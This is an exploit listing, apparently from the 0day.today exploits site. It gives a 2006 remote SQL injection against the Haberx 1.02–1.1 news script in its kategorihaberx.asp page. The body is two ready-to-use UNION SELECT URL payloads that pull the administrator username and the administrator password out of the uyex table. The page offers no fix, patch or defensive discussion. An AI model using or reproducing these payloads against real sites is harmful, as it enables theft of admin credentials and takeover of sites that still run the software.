[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Haberx 1.02 <= 1.1 (tr) Remote SQL Injection Vulnerability

Author
Fix TR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-837
Category
web applications
Date add
14-09-2006
Platform
unsorted
==========================================================
Haberx 1.02 <= 1.1 (tr) Remote SQL Injection Vulnerability
==========================================================


+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability    +
+ Author  : Fix TR                                +
+ Site    : www.hack.gen.tr                       +
+ Contact : fixtr[at]bsdmail.com                  +
+++++++++++++++++++++++++++++++++++++++++++++++++++


+ Versions: 1.02 between 1.1
+ Bug In  : kategorix.asp
+ Risk    : High


+ Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1

+ Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1



#  0day.today [2024-12-24]  #